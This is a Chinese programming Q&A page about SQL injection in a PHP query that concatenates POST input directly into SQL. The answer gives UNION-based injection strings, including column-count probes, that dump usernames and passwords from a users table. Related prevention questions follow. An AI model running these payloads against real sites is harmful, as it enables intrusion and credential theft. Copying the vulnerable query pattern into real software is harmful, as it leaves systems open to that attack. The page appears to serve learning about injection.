当前位置: 首页 > 知识库问答 >
问题:

PHP站点的SQL注入

郝修为
2023-03-14
$sql = "SELECT * FROM blogposts WHERE name= '" . $_POST["blogname"] . "'";

共有1个答案

严稳
2023-03-14

你会注射

' OR '1'='1' UNION SELECT Username, Password FROM users;--

这将使查询

SELECT * FROM blogposts WHERE name= '' OR '1'='1' UNION SELECT Username, Password FROM users;--'

它将原始更改查询的结果与users表的结果组合在一起。

     ' OR '1'='1' UNION SELECT 1 FROM users;--
     ' OR '1'='1' UNION SELECT 1,2 FROM users;--
     ' OR '1'='1' UNION SELECT 1,2,3 FROM users;--
' OR '1'='1' UNION SELECT Username, Password, 3,4,5 FROM users;--
 类似资料:
  • 问题内容: 我现在很困惑,想知道,如果您能为我解决问题。 在最新的Anon / Lulsec攻击之后,我开始质疑php / mysql的安全性。 所以,我想,我该如何保护PHP和Mysql。 问题:谁能向我解释,关于引号,处理PHP和Mysql的 最佳实践 是什么? 尤其是在表单中,为了保护html,我需要某种htmlspecialchars,对吗? 可以使用表单完全利用PHP吗?是否需要任何保护

  • 使用OpenSUSE v15.2, Apache. 使用zypper安装了PHP-FPM。遵循本网站上的说明:https://en.opensuse.org/SDB:Apache_FastCGI_and_PHP-FPM_配置 我重新启动了Apache和PHP-FPM。但是,网站未加载到浏览器中。 我得到HTTP错误502。 #####################################

  • 本文向大家介绍php防止sql注入的方法详解,包括了php防止sql注入的方法详解的使用技巧和注意事项,需要的朋友参考一下 一、什么是SQL注入式攻击?   所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQ

  • 本文向大家介绍PHP简单预防sql注入的方法,包括了PHP简单预防sql注入的方法的使用技巧和注意事项,需要的朋友参考一下 本文实例讲述了PHP简单预防sql注入的方法。分享给大家供大家参考,具体如下: 出现sql注入一般都是因为语法不规范不严谨造成的,问题出现在sql语句上,而起决定性的是quote(')。如下: 正常提交的话就是删除一条数据,若id提交的是(1 ' or 1 #),那么sql语

  • 问题内容: 这个问题已经在这里有了答案 : 如何防止PHP中进行SQL注入? (28个答案) 7年前关闭。 我已经建立了一个网站,该网站即将上线,并且有几个关于防止SQL注入的问题,我知道如何使用,但是我只是想知道是否必须在要获取的所有变量上使用它SQL语句,是否在执行select语句时还是在插入更新和删除时必须使用它?另外,在我将网站投入使用之前,您还建议我实施哪些其他安全措施,在此先感谢您的帮

  • 问题内容: 我已经读了很多书,但仍然不了解100%某些SQL注入是如何发生的! 我想从认识的人那里看到基于我的示例的SQL注入的具体示例,因此可以对其进行复制,测试和修复。我试图用SQL注入我的代码,但不能,所以我希望有人证明我的能力! 1.我对吗,SQL注入只能通过POST或GET方法进行,这意味着在网站上它应该是发布形式,例如“注册或搜索”或“ search.php?tags = love”之